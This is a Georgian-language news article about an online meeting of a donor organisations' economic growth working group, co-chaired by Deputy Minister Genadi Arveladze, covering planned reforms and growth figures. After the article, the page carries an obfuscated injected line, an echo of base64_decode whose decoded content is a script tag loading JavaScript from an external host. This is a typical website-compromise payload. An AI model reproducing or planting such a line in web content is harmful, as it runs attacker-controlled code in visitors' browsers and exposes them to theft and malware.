celsiusi
ავერსი საქკაბელი
ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილის გენადი არველაძის თანათავმჯდომარეობით დონორი ორგანიზაციების ეკონომიკური ზრდის თემატური სამუშაო ჯგუფის ონლაინ - შეხვედრა გაიმართა. მასში მონაწილეობა მიიღეს 20-ზე მეტი დონორი ორგანიზაციისა და საქართველოს სამთავრობო უწყებების წარმომადგენლებმა. დონორთა სხდომას თავმჯდომარეობდა ევროპის საინვესტიციო ბანკის რეგიონული დირექტორი სამხრეთ კავკასიაში მაჩიე ჩურა.
 
ონლაინ - შეხვედრაზე საქართველოს სამთავრობო უწყებების წარმომადგენლთა მხრიდან გაკეთდა პრეზენტაციები მომდევნო წლებში დაგეგმილი რეფორმებისა და შესაბამისი პროექტების შესახებ, რომლებიც დონორთა მხარდაჭერით უნდა განხორციელდეს. მათ შორის, ვაჭრობის, ტრანსპორტის, ინფრასტრუქტურის, „მწვანე ეკონომიკის“ მიმართულებებით.
 
მისასალმებელ სიტყვაში, მინისტრის მოადგილე ყურადღება გაამახვილა იმ მხარდაჭერის მნიშვნელობაზე, რომელთაც განვითარების ორგანიზაციები საქართველოში ახორციელებენ. მისი თქმით, საქართველოს მთავრობამ შეიმუშავა 10-წლიანი განვითარების გეგმა, რომელმაც საკმაოდ ამბიციური სამიზნე მაჩვენებლები აქვს. გენადი არველაძის განცხადებით, პანდემიის შედეგად გამოწვეული ეკონომიკური ვარდნის შემდეგ მნიშვნელოვნად იზრდება ქვეყნის მაკროეკონომიკური მაჩვენებლები.
 
„მთავრობის ანტიკრიზისული გადაწყვეტილებები შედეგად სახეზეა საქართველოს ეკონომიკის მნიშვნელოვანი ზრდა, რომელმაც იანვარი - ივლისში 12,7 პროცენტი შეადგინა. მნიშვნელოვანია, რომ წამყვანმა საფინანსო ორგანიზაციებმა გადახედეს წლის დასაწყისში გამოქვეყნებულ ეკონომიკური ზრდის საპროგნოზო მაჩვენებლებს მატების მიმართულებით. მაგალითად, საერთაშორისო სავალუტო ფონდმა მშპ-ს საპროგნოზო მაჩვენებელი 7,7 პროცენტამდე გაზარდა და საქართველო დაასახელა ქვეყნად, სადაც საშუალოვადიან პერიოდში ევროპის რეგიონის მასშტაბით ეკონომიკის ყველაზე სწრაფი აღდგენა იქნება შესაძლებელი. ამის გათვალისწინებით, ვფიქრობ, რომ უკვე შეგვიძლია, დავუბრუნდეთ განვითარების ჩვეულ დღის წესრიგს,“ - განაცხადა გენადი არველაძემ.
 
აღსანიშნავია, რომ საქართველოს მთავრობა, მიმდინარე რეფორმებისა და განვითარების საჭიროებების შესახებ დონორი ქვეყნებისა და ორგანიზაციებისთვის ინფორმაციის თანმიმდევრულად მიწოდების, ასევე, სახელმწიფო უწყებების ინიციატივების რეალიზებისა და საგარეო დახმარების რესურსების მობილიზების ხელშეწყობის მიზნით, თემატური საკოორდინაციო ჯგუფების შეხვედრებს რეგულარულად აწყობს.
1083
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");